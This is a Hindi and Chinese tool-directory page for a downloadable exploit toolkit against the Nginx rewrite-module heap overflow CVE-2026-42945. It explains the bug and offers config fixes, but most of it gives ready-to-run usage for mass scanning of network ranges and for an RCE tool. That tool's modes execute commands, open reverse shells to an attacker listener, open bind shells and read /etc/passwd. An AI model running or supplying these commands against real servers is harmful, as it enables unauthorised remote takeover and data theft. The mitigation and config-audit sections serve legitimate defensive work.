Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-42945 — CVE-2026-42945 Nginx Rift | Kitploit
उपकरण/GitHubGitHub/liaoziqi-gzfls/cve-2026-42945
टोहीभेद्यता विश्लेषणशोषणजानकारी एकत्र करनावेब सुरक्षाफज़िंगपेनिट्रेशन टेस्टिंगपेलोड डेवलपमेंटबाइनरी शोषण
GitHubliaoziqi-gzfls/cve-2026-42945

CVE-2026-42945

CVE-2026-42945 Nginx Rift

173 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें

CVE-2026-42945 Nginx Rift - PoC टूलकिट

CVE-2026-42945 (Nginx Rift) के लिए एक व्यापक प्रूफ-ऑफ-कॉन्सेप्ट टूलकिट, जो Nginx के ngx_http_rewrite_module में एक गंभीर हीप बफर ओवरफ्लो भेद्यता है।


भेद्यता सारांश

फ़ील्डविवरण
CVE IDCVE-2026-42945
नामNginx Rift
प्रकारहीप बफर ओवरफ्लो
घटकngx_http_rewrite_module
गंभीरतागंभीर (CVSS 9.2)
प्रभावितNginx 0.6.27 - 1.30.0
पैच किया गयाNginx 1.30.1 / 1.31.0

मूल कारण

रीराइट नियमों को प्रोसेस करते समय दो आंतरिक पासों के बीच आकार की गलत गणना के कारण यह भेद्यता मौजूद है। यदि कॉन्फ़िगरेशन में निम्नलिखित का उपयोग किया जाता है:

  • अनाम रेगेक्स कैप्चर ($1, $2, आदि)
  • प्रतिस्थापन स्ट्रिंग में ? के साथ संयुक्त

Nginx पहले पास के दौरान आवश्यक बफर आकार की गलत गणना करता है और दूसरे पास के दौरान आवंटित हीप बफर से परे लिखता है।

उदाहरण भेद्य कॉन्फ़िगरेशन

root@kitploit:~
server {
    # भेद्य: अनाम कैप्चर ($1) + प्रतिस्थापन में '?'
    location /api/ {
        rewrite ^/api/(.*)$ /v1/$1?version=2 last;
    }
}

सुरक्षित कॉन्फ़िगरेशन (पैच किया गया)

root@kitploit:~
server {
    # सुरक्षित: नामित कैप्चर (?P<path>) $1 को बदलता है
    location /api/ {
        rewrite ^/api/(?P<path>.*)$ /v1/$path?version=2 last;
    }
}

टूलकिट घटक

1. nginx_rift_poc.py - कोर PoC टूल

एकल-लक्ष्य भेद्यता स्कैनर और शोषण उपकरण।

विशेषताएँ:

  • Server हेडर से Nginx संस्करण का पता लगाएं
  • जांचें कि संस्करण भेद्य सीमा में है या नहीं
  • हीप ओवरफ्लो ट्रिगर करने के लिए तैयार HTTP पेलोड भेजें
  • भेद्य/सुरक्षित परीक्षण कॉन्फ़िगरेशन उत्पन्न करें

उपयोग:

root@kitploit:~
# संस्करण का पता लगाएं और भेद्यता का परीक्षण करें
python nginx_rift_poc.py -t target.example.com

# कस्टम पेलोड के साथ परीक्षण
python nginx_rift_poc.py -t target.example.com -p "/api/AAAA...?x=1"

# HTTPS लक्ष्य
python nginx_rift_poc.py -t target.example.com --ssl -p 443

# भेद्य परीक्षण कॉन्फ़िगरेशन उत्पन्न करें
python nginx_rift_poc.py --gen-vuln-config > vuln.conf

# सुरक्षित (पैच किया गया) कॉन्फ़िगरेशन उत्पन्न करें
python nginx_rift_poc.py --gen-safe-config > safe.conf

2. nginx_rift_scanner.py - सामूहिक स्कैनर

एक साथ कई लक्ष्यों के परीक्षण के लिए बैच स्कैनर।

विशेषताएँ:

  • मल्टी-थ्रेडेड स्कैनिंग (डिफ़ॉल्ट 50 थ्रेड)
  • फ़ाइल या CIDR नेटवर्क रेंज से लक्ष्य सूची
  • एकीकरण के लिए JSON आउटपुट
  • पोर्ट 443 के लिए स्वचालित SSL पहचान

उपयोग:

root@kitploit:~
# लक्ष्य फ़ाइल से स्कैन करें (प्रारूप: प्रति पंक्ति host:port)
python nginx_rift_scanner.py -f targets.txt -o results.json

# एकल लक्ष्य स्कैन करें
python nginx_rift_scanner.py -t example.com -p 443 --ssl

# नेटवर्क रेंज स्कैन करें
python nginx_rift_scanner.py -t 192.168.1.0/24 -p 80,443,8080

# हाई-स्पीड स्कैन
python nginx_rift_scanner.py -f targets.txt --threads 100 -o results.json

लक्ष्य फ़ाइल प्रारूप:

root@kitploit:~
# टिप्पणियाँ # से शुरू होती हैं
192.168.1.1:80
192.168.1.2:443:ssl
example.com:8080

3. config_checker.py - कॉन्फ़िगरेशन विश्लेषक

भेद्य रीराइट पैटर्न के लिए स्थानीय Nginx कॉन्फ़िगरेशन फ़ाइलों को स्कैन करें।

विशेषताएँ:

  • nginx.conf पार्स करें और include निर्देशों का अनुसरण करें
  • प्रतिस्थापन स्ट्रिंग्स में ? के साथ अनाम कैप्चर का पता लगाएं
  • ऑटो-फिक्स समर्थन (बैकअप के साथ)
  • रिकर्सिव डायरेक्टरी स्कैनिंग

उपयोग:

root@kitploit:~
# एकल फ़ाइल स्कैन करें
python config_checker.py /etc/nginx/nginx.conf

# डायरेक्टरी को पुनरावर्ती रूप से स्कैन करें
python config_checker.py -d /etc/nginx/conf.d/

# भेद्य पैटर्न को ऑटो-फिक्स करें (.bak बैकअप बनाता है)
python config_checker.py --fix /etc/nginx/nginx.conf

# सामान्य Nginx पथों का स्वचालित पता लगाएं
python config_checker.py

4. enhanced_poc.py - उन्नत RCE PoC

depthfirst के आधिकारिक शोध पर आधारित उन्नत शोषण उपकरण, जो एकाधिक रीराइट पैटर्न और शोषण मोड का समर्थन करता है।

विशेषताएँ:

  • 8 सामान्य भेद्य रीराइट पैटर्न (/api/, /redirect/, /user/, आदि) का स्वचालित पता लगाएं
  • एकाधिक ओवरफ्लो ट्रिगर वर्ण (+, &, =, %) के लिए समर्थन
  • नियंत्रित ओवरफ्लो आकार के साथ स्मार्ट पेलोड जनरेशन
  • एकाधिक शोषण मोड: cmd / shell / bind / read
  • ASLR-बंद वातावरण के लिए कस्टम हीप/libc बेस पते
  • फेक ngx_pool_cleanup_s के साथ डायनामिक स्प्रे बॉडी निर्माण

उपयोग:

root@kitploit:~
# पैटर्न और संस्करण का स्वचालित पता लगाएं
python enhanced_poc.py -t target.example.com --detect

# कमांड निष्पादित करें (ASLR बंद)
python enhanced_poc.py -t target.example.com --cmd "id > /tmp/pwned"

# रिवर्स शेल
python enhanced_poc.py -t target.example.com --shell --listen-ip 10.0.0.1 --listen-port 4444

# बाइंड शेल
python enhanced_poc.py -t target.example.com --bind --listen-port 5555

# रिमोट फ़ाइल पढ़ें
python enhanced_poc.py -t target.example.com --read /etc/passwd

# कस्टम हीप बेस (ASLR-बंद लक्ष्यों के लिए)
python enhanced_poc.py -t target.example.com --cmd "whoami" --heap-base 0x555555554000

# ओवरफ्लो ट्रिगर के रूप में & का उपयोग करें
python enhanced_poc.py -t target.example.com --cmd "id" --escape-char "&"

शोषण मोड विवरण:

पता कॉन्फ़िगरेशन (केवल ASLR-बंद):

  • --heap-base: लक्ष्य हीप बेस (जैसे, 0x555555559000)
  • --libc-base: libc बेस पता (जैसे, 0x7ffff77ba000)
  • --system-addr: प्रत्यक्ष system() पता (libc-base को ओवरराइड करता है)

5. aslr_leak_detector.py - ASLR लीक डिटेक्टर

ASLR सुरक्षा को बायपास करने वाली सूचना लीक का पता लगाने के लिए व्यापक स्कैनर।

विशेषताएँ:

  • HTTP हेडर लीक डिटेक्शन (Server, X-Powered-By, आदि)
  • मेमोरी पतों और स्टैक ट्रेस के लिए त्रुटि पृष्ठ विश्लेषण
  • Nginx-विशिष्ट एंडपॉइंट प्रोबिंग (/nginx_status, /actuator/*, आदि)
  • मेमोरी पता लीक डिटेक्शन (64-बिट पॉइंटर्स, हीप/libc/स्टैक पते)
  • टाइमिंग विश्लेषण के माध्यम से हीप लेआउट प्रोबिंग
  • ASLR स्थिति अनुमान (सक्षम/अक्षम/कमजोर)
  • JSON रिपोर्ट के माध्यम से enhanced_poc.py के साथ सीधा एकीकरण

उपयोग:

root@kitploit:~
# एकल लक्ष्य स्कैन करें
python aslr_leak_detector.py -t target.example.com

# SSL के साथ स्कैन करें
python aslr_leak_detector.py -t target.example.com -p 443 --ssl

# फ़ाइल से स्कैन करें, रिपोर्ट सहेजें
python aslr_leak_detector.py -f targets.txt -p 80,443 -o leak_report.json

# नेटवर्क रेंज स्कैन करें
python aslr_leak_detector.py -t 192.168.1.0/24 -p 80,443

# त्वरित स्कैन मोड
python aslr_leak_detector.py -t target.example.com --quick

उन्नत PoC के साथ एकीकरण:

root@kitploit:~
# चरण 1: लीक का पता लगाएं
python aslr_leak_detector.py -t target.example.com -o leak.json

# चरण 2: शोषण के लिए लीक किए गए पतों का उपयोग करें
python enhanced_poc.py -t target.example.com \
  --heap-base 0x555555559000 \
  --libc-base 0x7ffff77ba000 \
  --cmd "id"

भेद्यता पहचान संकेतक

PoC उपकरण इन संकेतकों के माध्यम से भेद्यता की पहचान करता है:

संकेतकविवरण
कनेक्शन ड्रॉप किया गया

स्थापना

कोई बाहरी निर्भरता आवश्यक नहीं है। केवल Python मानक पुस्तकालय का उपयोग करता है।

root@kitploit:~
# टूलकिट क्लोन या डाउनलोड करें
git clone <repository-url>
cd CVE-2026-42945

# Python संस्करण सत्यापित करें (3.7+ अनुशंसित)
python3 --version

# कोई भी उपकरण चलाएं
python3 nginx_rift_poc.py --help

प्रभावित संस्करण


शमन

तत्काल कार्रवाई

  1. Nginx को पैच करें संस्करण 1.30.1 (स्थिर) या 1.31.0 (मेनलाइन) पर
  2. कॉन्फ़िगरेशन का ऑडिट करें भेद्य रीराइट पैटर्न के लिए
  3. ASLR सक्षम करें सभी होस्टों पर जो Nginx वर्कर प्रक्रियाएँ चला रहे हैं

कॉन्फ़िगरेशन वर्कअराउंड

यदि पैचिंग तुरंत संभव नहीं है, तो अनाम कैप्चर को नामित कैप्चर से बदलें:

root@kitploit:~
# पहले (भेद्य)
rewrite ^/api/(.*)$ /v1/$1?version=2 last;

# बाद में (सुरक्षित)
rewrite ^/api/(?P<path>.*)$ /v1/$path?version=2 last;

WAF वर्चुअल पैचिंग

भेद्य रीराइट पैटर्न को लक्षित करने वाले दुर्भावनापूर्ण अनुरोधों को ब्लॉक करने के लिए WAF नियम तैनात करें।


अस्वीकरण

यह टूलकिट केवल अधिकृत सुरक्षा परीक्षण और अनुसंधान उद्देश्यों के लिए है।

  • केवल उन सिस्टम के खिलाफ उपयोग करें जिनके आप मालिक हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट अनुमति है
  • कंप्यूटर सिस्टम तक अनधिकृत पहुंच अवैध है
  • लेखक इस उपकरण के दुरुपयोग या इसके कारण होने वाली क्षति के लिए जिम्मेदार नहीं हैं
  • उत्पादन उपयोग से पहले हमेशा पृथक वातावरण में परीक्षण करें

संबंधित CVE

यह दोष तीन अन्य मेमोरी-भ्रष्टाचार समस्याओं के साथ खोजा गया था:

CVEविवरणगंभीरता
CVE-2026-42946SCGI/UWSGI मेमोरी आवंटन दोषउच्च
CVE-2026-40701OCSP के लिए DNS रिज़ॉल्यूशन में उपयोग-के-बाद-मुक्तमध्यम
CVE-2026-42934UTF-8 पार्सिंग आउट-ऑफ-बाउंड्स रीडमध्यम

संदर्भ

  • F5 सुरक्षा सलाहकार
  • Nginx सुरक्षा
  • CVE-2026-42945 विवरण

लाइसेंस

यह परियोजना शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए प्रदान की गई है।


लेखक: सुरक्षा अनुसंधान दल दिनांक: 2026-06-11


中文说明 (Chinese Documentation)

漏洞概述

CVE-2026-42945(Nginx Rift)是 Nginx ngx_http_rewrite_module 模块中的一个堆缓冲区溢出漏洞,自 2008 年(Nginx 0.6.27)就已存在,潜伏了约 18 年。

漏洞原理

在处理 rewrite 规则时,Nginx 内部会进行两次解析。如果配置中同时满足以下两个条件:

  1. 使用未命名正则捕获(如 $1、$2)
  2. 替换字符串中包含 ? 字符

Nginx 在第一遍解析时会错误计算缓冲区大小,在第二遍解析时写入超出堆缓冲区边界的数据,导致堆溢出。

脆弱配置示例(有漏洞)

root@kitploit:~
server {
    # 有漏洞:未命名捕获 $1 + 替换字符串中的 ?
    location /api/ {
        rewrite ^/api/(.*)$ /v1/$1?version=2 last;
    }
}

安全配置示例(已修复)

root@kitploit:~
server {
    # 安全:使用命名捕获 (?P<name>) 替代 $1
    location /api/ {
        rewrite ^/api/(?P<path>.*)$ /v1/$path?version=2 last;
    }
}

工具组件说明

1. nginx_rift_poc.py — 核心 PoC 工具

单目标漏洞检测与利用工具。

功能:

  • 从 Server 响应头检测 Nginx 版本
  • 判断版本是否在脆弱范围内
  • 发送精心构造的 HTTP 请求触发堆溢出
  • 生成用于测试的脆弱/安全配置

使用示例:

root@kitploit:~
# 检测版本并测试漏洞
python nginx_rift_poc.py -t target.example.com

# 使用自定义 Payload 测试
python nginx_rift_poc.py -t target.example.com -p "/api/AAAA...?x=1"

# HTTPS 目标
python nginx_rift_poc.py -t target.example.com --ssl -p 443

# 生成脆弱测试配置
python nginx_rift_poc.py --gen-vuln-config > vuln.conf

# 生成安全(已修复)配置
python nginx_rift_poc.py --gen-safe-config > safe.conf

2. nginx_rift_scanner.py — 批量扫描器

多线程并发扫描多个目标。

功能:

  • 默认 50 线程并发扫描
  • 支持从文件或 CIDR 网段读取目标
  • JSON 格式输出结果
  • 自动识别 443 端口的 SSL 连接

使用示例:

root@kitploit:~
# 从目标文件扫描(格式:每行 host:port)
python nginx_rift_scanner.py -f targets.txt -o results.json

# 扫描单个目标
python nginx_rift_scanner.py -t example.com -p 443 --ssl

# 扫描整个网段
python nginx_rift_scanner.py -t 192.168.1.0/24 -p 80,443,8080

# 高速扫描(100线程)
python nginx_rift_scanner.py -f targets.txt --threads 100 -o results.json

目标文件格式:

root@kitploit:~
# 井号开头的行为注释
192.168.1.1:80
192.168.1.2:443:ssl
example.com:8080

3. config_checker.py — 配置文件检查器

扫描本地 Nginx 配置文件中的脆弱 rewrite 模式。

功能:

  • 解析 nginx.conf 并递归解析 include 引用的文件
  • 检测包含未命名捕获 + ? 的 rewrite 指令
  • 支持自动修复(自动创建 .bak 备份)
  • 递归扫描目录

使用示例:

root@kitploit:~
# 扫描单个文件
python config_checker.py /etc/nginx/nginx.conf

# 递归扫描目录
python config_checker.py -d /etc/nginx/conf.d/

# 自动修复脆弱配置(自动备份原文件)
python config_checker.py --fix /etc/nginx/nginx.conf

# 自动探测常见 Nginx 配置路径
python config_checker.py

4. enhanced_poc.py — 增强版 RCE PoC

基于 depthfirst 官方研究的高级漏洞利用工具,支持多种 rewrite 模式和利用方式。

功能:

  • 自动探测 8 种常见脆弱 rewrite 模式(/api/、/redirect/、/user/ 等)
  • 支持多种溢出触发字符(+、&、=、%)
  • 智能 payload 生成,精确控制溢出大小
  • 多种利用模式:cmd / shell / bind / read
  • 自定义堆/libc 基址(用于 ASLR 关闭环境)
  • 动态构造 spray body,包含 fake ngx_pool_cleanup_s

溢出触发字符扩展表:

使用示例:

root@kitploit:~
# 自动探测配置模式和版本
python enhanced_poc.py -t target.example.com --detect

# 执行命令(ASLR 关闭环境)
python enhanced_poc.py -t target.example.com --cmd "id > /tmp/pwned"

# 反弹 Shell
python enhanced_poc.py -t target.example.com --shell --listen-ip 10.0.0.1 --listen-port 4444

# 绑定 Shell(在目标上监听)
python enhanced_poc.py -t target.example.com --bind --listen-port 5555

# 读取远程文件
python enhanced_poc.py -t target.example.com --read /etc/passwd

# 自定义堆基址
python enhanced_poc.py -t target.example.com --cmd "whoami" --heap-base 0x555555554000

# 使用 & 作为溢出触发字符
python enhanced_poc.py -t target.example.com --cmd "id" --escape-char "&"

利用模式说明:

地址配置(仅 ASLR 关闭环境):

  • --heap-base: 目标堆基址(如 0x555555559000)
  • --libc-base: libc 基址(如 0x7ffff77ba000)
  • --system-addr: 直接指定 system() 地址

5. aslr_leak_detector.py — ASLR 信息泄露检测工具

综合扫描器,检测可用于绕过 ASLR 防护的信息泄露漏洞。

功能:

  • HTTP 响应头泄露检测(Server、X-Powered-By 等)
  • 错误页面分析(内存地址、堆栈跟踪)
  • Nginx 特定端点探测(/nginx_status、/actuator/* 等)
  • 内存地址泄露检测(64位指针、堆/libc/栈地址)
  • 堆布局探测(通过响应时间差异推断内存状态)
  • ASLR 状态推断(开启/关闭/弱)
  • 通过 JSON 报告直接与 enhanced_poc.py 集成

使用示例:

root@kitploit:~
# 扫描单个目标
python aslr_leak_detector.py -t target.example.com

# SSL 扫描
python aslr_leak_detector.py -t target.example.com -p 443 --ssl

# 从文件批量扫描并保存报告
python aslr_leak_detector.py -f targets.txt -p 80,443 -o leak_report.json

# 扫描网段
python aslr_leak_detector.py -t 192.168.1.0/24 -p 80,443

# 快速扫描
python aslr_leak_detector.py -t target.example.com --quick

与增强版 PoC 的联动使用:

root@kitploit:~
# 步骤 1:检测信息泄露
python aslr_leak_detector.py -t target.example.com -o leak.json

# 步骤 2:使用泄露的地址进行利用
python enhanced_poc.py -t target.example.com \
  --heap-base 0x555555559000 \
  --libc-base 0x7ffff77ba000 \
  --cmd "id"

漏洞检测指标

PoC 工具通过以下现象判断目标是否存在漏洞:

检测指标说明
连接断开目标异常关闭连接(Worker 进程崩溃)
网关错误返回 HTTP 502/503/504(Worker 进程已死)
响应变慢响应时间显著增加(进程崩溃后自动重启)
空响应体

安装方法

无需安装任何第三方依赖,仅使用 Python 标准库即可运行。

root@kitploit:~
# 克隆或下载工具包
git clone <repository-url>
cd CVE-2026-42945

# 验证 Python 版本(推荐 3.7+)
python3 --version

# 查看工具帮助
python3 nginx_rift_poc.py --help

影响版本


缓解措施

紧急处置建议

  1. 立即升级 Nginx 到 1.30.1(稳定版)或 1.31.0(主线版)
  2. 审计配置文件 中是否存在脆弱的 rewrite 模式
  3. 开启 ASLR 地址空间布局随机化,增加 RCE 利用难度

临时缓解方案(无法立即升级时)

将未命名捕获替换为命名捕获:

root@kitploit:~
# 修改前(有漏洞)
rewrite ^/api/(.*)$ /v1/$1?version=2 last;

# 修改后(安全)
rewrite ^/api/(?P<path>.*)$ /v1/$path?version=2 last;

WAF 虚拟补丁

部署 Web 应用防火墙规则,拦截针对脆弱 rewrite 模式的恶意请求。


免责声明

本工具包仅供授权的安全测试和研究用途。

  • 仅对您拥有所有权或已获得明确授权的系统使用本工具
  • 未经授权访问计算机系统是违法行为
  • 作者不对本工具的滥用或造成的损害承担责任
  • 请始终在隔离环境中测试后再用于生产环境

相关漏洞

此漏洞是由 depthfirst 的 AI 驱动静态分析系统发现的一系列内存损坏问题之一:

CVE 编号描述等级
CVE-2026-42946SCGI/UWSGI 内存分配缺陷高危
CVE-2026-40701OCSP DNS 解析 UAF中危
CVE-2026-42934UTF-8 解析越界读取中危

参考链接

  • F5 安全公告
  • Nginx 安全公告
  • CVE-2026-42945 详情
  • SonicWall 技术分析
  • Cloud Security Alliance 研究报告

开源协议

本项目仅供教育用途和授权安全测试使用。


作者: Security Research Team 日期: 2026-06-11

टूल डाउनलोड करें
मोडविवरणआउटपुट
cmdएकल शेल कमांड निष्पादित करेंलक्ष्य पर कमांड आउटपुट
shellरिवर्स शेल उत्पन्न करें--listen-ip:listen-port पर वापस कनेक्ट होता है
bindलक्ष्य पर बाइंड शेल उत्पन्न करेंलक्ष्य पर --listen-port पर सुनें
readलक्ष्य से फ़ाइल पढ़ेंसामग्री /tmp/nginx_rift_read में लिखी गई
लक्ष्य अप्रत्याशित रूप से कनेक्शन बंद करता है (वर्कर क्रैश)
गेटवे त्रुटियाँHTTP 502/503/504 प्रतिक्रियाएँ (वर्कर प्रक्रिया मृत)
धीमी प्रतिक्रियाएँप्रतिक्रिया समय में महत्वपूर्ण वृद्धि (क्रैश रिकवरी)
खाली प्रतिक्रियाएँबेसलाइन की तुलना में प्रतिक्रिया बॉडी गायब हो जाती है
संस्करण मिलानपता लगाया गया Nginx संस्करण भेद्य सीमा में है
उत्पादप्रभावितपैच किया गया
Nginx ओपन सोर्स0.6.27 - 1.30.01.30.1 / 1.31.0
Nginx PlusR32 - R36R32 P6 / R36 P4
Nginx Ingress Controllerपैच से पहले के सभी संस्करणपैच किए गए रिलीज़ में अपडेट करें
Nginx Gateway Fabricपैच से पहले के सभी संस्करणपैच किए गए रिलीज़ में अपडेट करें
字段详情
CVE 编号CVE-2026-42945
漏洞名称Nginx Rift
漏洞类型堆缓冲区溢出(Heap Buffer Overflow)
影响组件ngx_http_rewrite_module
危害等级严重(CVSS 9.2)
影响版本Nginx 0.6.27 - 1.30.0
修复版本Nginx 1.30.1 / 1.31.0
字符扩展为每字符溢出
+%2B+2 字节
&%26+2 字节
=%3D+2 字节
%%25+2 字节
空格%20+2 字节
模式说明输出
cmd执行单条 shell 命令命令输出保存在目标上
shell生成反弹 shell连接回 --listen-ip:listen-port
bind生成绑定 shell在目标 --listen-port 上监听
read读取目标文件内容写入 /tmp/nginx_rift_read
与基线对比,响应体为空(Worker 已崩溃)
版本匹配检测到的 Nginx 版本在脆弱范围内
产品受影响版本修复版本
Nginx 开源版0.6.27 - 1.30.01.30.1 / 1.31.0
Nginx PlusR32 - R36R32 P6 / R36 P4
Nginx Ingress Controller未打补丁的所有版本更新到已修复版本
Nginx Gateway Fabric未打补丁的所有版本更新到已修复版本